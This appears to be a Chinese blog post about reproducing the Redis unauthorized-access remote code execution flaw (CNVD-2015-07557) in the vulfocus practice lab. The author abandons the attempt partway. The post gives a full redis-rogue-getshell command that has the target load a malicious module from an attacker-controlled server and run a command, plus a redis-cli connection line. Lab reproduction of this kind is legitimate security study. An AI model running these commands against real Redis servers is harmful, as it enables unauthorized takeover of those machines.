cnvd_2015_07557-redis未授权访问rce漏洞复现-vulfocus复现

1.复现环境与工具

环境是在vulfocus上面

工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module

参考攻击使用方式与原理:https://vulhub.org/#/environments/redis/4-unacc/

2.复现

需要一个外网的服务器做,上传这个工具到服务器上进入这个文件夹里面后输入命令:
python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你开放的端口 -f RedisModulesSDK/exp.so -c "id"

出了一个file,搜了一下是由于这个文件用python3写的,要检查一下你的服务器上是不是python版本3.0以上,用where python查python的安装位置
ls -l 目录/py* 得到代python的所有文件,看有没有python3 ,他的命令是什么
参考:Linux系统安装Python3环境(超详细)-腾讯云开发者社区-腾讯云

我这里是装了的,名称为python3

这个要先根据他github上面的内容去做make之后再运行
python3 redis-master.py -r 目的ip -p 目的端口 -L 攻击者ip -P 对应端口 -f RedisModulesSDK/exp.so -c "id"redis-cli -h 123.58.224.8 -p 45635
用redis组件去连接上这个redis,之后按照我的理解来说应该是用redis写入公钥连接才对:

参考redis未授权访问-cnvd 2015-0755漏洞复现 - FreeBuf网络安全行业门户

但是去试的时候发现

好像是环境有点问题,没权限了
所以需要用写入web的方法去做,要换工具做
要是还是想得到flag的话就参考

未授权漏洞vulfocu靶场实战_vulfocus中redis未授权漏洞如何拿到falg-CSDN博客

vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557-CSDN博客

我太懒了,实在不想重新来过了

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值